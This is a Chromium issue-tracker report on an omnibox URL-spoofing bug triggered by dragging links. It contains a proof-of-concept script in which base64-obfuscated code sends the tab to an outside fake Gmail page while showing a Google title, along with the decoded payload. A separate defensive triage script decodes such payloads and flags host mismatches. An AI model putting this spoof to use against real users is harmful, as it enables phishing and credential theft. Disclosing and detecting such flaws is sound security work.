Security: Chrome Omnibox Spoofing with Drag&Drop
Reported by xis...@gmail.com, Jul 13
Issue description
VULNERABILITY DETAILS
When navigation succeeds, the Drag&Drop's URL is always shown in the omnibox and fails to refresh on navigation.
VERSION
Chrome Version: 67.0.3396.99+[Stable]
Operating System: [Windows]
REPRODUCTION CASE
Drag and drop links to the current TAB.
POC:
<script>
document.addEventListener("dragend", function() {
document.write(atob('PGgxPlNwb29mPC9oMT4KPHNjcmlwdD4KbG9jYXRpb249J2h0dHA6Ly94aXNpZ3IuY29tL3Rlc3QxOTk1L0dtYWlsLmh0bSc7Ci8vbG9jYXRpb249J2h0dHBzOi8vYXBwbGUuY29tJzsKPC9zY3JpcHQ+Cgo='));
document.write('<title>Google</title>');
});
</script>
<p>
Drag and drop links to the current TAB.
</p>
<a href="https://www.gmail.com/">www.gmail.com</a>
base64 decode:
<h1>Spoof</h1>
<script>
location='http://xisigr.com/test1995/Gmail.htm';
//location='https://apple.com';
</script>
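An analyst-side check for the PoC above, added here as an example and not part of the original report or of Chromium's code: it decodes the atob() payload and reports whether a drag handler navigates to a host other than the link the page offers for dragging. The function names (decodeAtobLiterals, hostOf, navigationTargets, linkHosts, triage) are hypothetical; SAMPLE is the report's PoC held as a string.

```javascript
// Added triage helper (not from the report). SAMPLE is the report's PoC kept as
// inert text: it is only parsed as a string here, never rendered or executed.
const SAMPLE = [
  '<script>',
  'document.addEventListener("dragend", function() {',
  "document.write(atob('PGgxPlNwb29mPC9oMT4KPHNjcmlwdD4KbG9jYXRpb249J2h0dHA6Ly94aXNpZ3IuY29tL3Rlc3QxOTk1L0dtYWlsLmh0bSc7Ci8vbG9jYXRpb249J2h0dHBzOi8vYXBwbGUuY29tJzsKPC9zY3JpcHQ+Cgo='));",
  "document.write('<title>Google</title>');",
  '});',
  '</script>',
  '<a href="https://www.gmail.com/">www.gmail.com</a>',
].join('\n');

// Decode every string literal passed to atob() so hidden markup can be inspected.
function decodeAtobLiterals(html) {
  const re = /atob\(\s*(['"])([A-Za-z0-9+\/=]+)\1\s*\)/g;
  return [...html.matchAll(re)].map((m) => Buffer.from(m[2], 'base64').toString('utf8'));
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; } // relative or malformed
}

// List location assignments line by line; commented-out ones are kept but marked inactive.
function navigationTargets(script) {
  const re = /^\s*(\/\/)?\s*(?:window\.|document\.)?location(?:\.href)?\s*=\s*(['"])(.*?)\2/;
  return script.split('\n').map((line) => re.exec(line)).filter(Boolean)
    .map((m) => ({ url: m[3], host: hostOf(m[3]), active: !m[1] }));
}

// Hosts of the links the page offers the user to drag.
function linkHosts(html) {
  return [...html.matchAll(/<a\s[^>]*href=(['"])(.*?)\1/gi)].map((m) => hostOf(m[2]));
}

// Flag a page whose drag/drop handler is present and whose decoded payload
// navigates to a host that none of the draggable links point at.
function triage(html) {
  const dragHandler = /addEventListener\(\s*['"](?:drag\w*|drop)['"]/.test(html);
  const offered = linkHosts(html);
  const targets = decodeAtobLiterals(html).flatMap((s) => navigationTargets(s));
  const mismatched = targets.filter((t) => t.active && t.host && !offered.includes(t.host));
  return { dragHandler, offered, targets, suspicious: dragHandler && mismatched.length > 0 };
}

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```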
Jul 13
(oops, hit Enter too soon) This looks identical to issue 698156, though please do let me know if I'm missing something. We would like to do something to differentiate pending navigations from those that have committed (besides the lock icon, which is a mitigating factor in this attack), but we're not quite sure yet what to do that users will realistically notice/understand.
Jul 18
Oct 20
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by est...@chromium.org, Jul 13
Components: UI>Browser>Navigation UI>Browser>Omnibox
Labels: Security_Severity-Low M-70 OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
Status: Available (was: Unconfirmed)